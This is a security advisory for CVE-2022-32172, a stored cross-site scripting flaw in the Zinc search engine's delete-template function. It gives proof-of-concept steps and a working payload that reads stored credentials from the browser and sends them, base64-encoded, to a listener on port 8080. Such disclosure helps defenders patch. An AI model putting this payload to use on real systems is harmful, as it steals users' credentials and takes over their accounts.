CVE-2022-32172
Date: October 6, 2022
Overview
In Zinc, versions v0.1.9 through v0.3.1 are vulnerable to Stored Cross-Site Scripting in the delete template functionality. When an authenticated user deletes a template whose name field contains an XSS payload, the JavaScript payload is executed in that user's browser and lets an attacker obtain the user's credentials.
Details
Zinc is vulnerable to Stored Cross-Site Scripting in the delete template functionality. When an authenticated user deletes a template whose name field contains an XSS payload, the JavaScript payload is executed in that user's browser. If the payload issues a request to a host controlled by the attacker, the base64-encoded credentials of the user who deleted the template are sent to the attacker, who can then use them to access the site on behalf of that user.
PoC Details
1. Log in to the application as a user and create a new template.
2. Enter the XSS payload provided in the PoC Code section below in the template name field, fill in the other fields, and save the template.
3. Start a listener on port 8080 (the PoC payload sends to 127.0.0.1:8080) to receive the victim's credentials.
4. Now log in as an admin user and navigate to the created template.
5. Under the actions tab, click on the delete button.
6. The JavaScript payload is executed, and the admin's credentials, encoded in base64, are sent to the attacker's listener.
PoC Code
"><img src=x onerror=this.a=window.location.href.slice(0,7);this.src=this.a+'127.0.0.1:8080'+this.a[6]+'x='+localStorage.getItem("creds")>
Affected Environments
Zinc versions v0.1.9 through v0.3.1
Prevention
Upgrade to Zinc version v0.3.2
Language: Go
Good to know:
Metric | Value
---|---
Base Score | 
Attack Vector (AV) | Network
Attack Complexity (AC) | Low
Privileges Required (PR) | Low
User Interaction (UI) | Required
Scope (S) | Changed
Confidentiality (C) | Low
Integrity (I) | Low
Availability (A) | None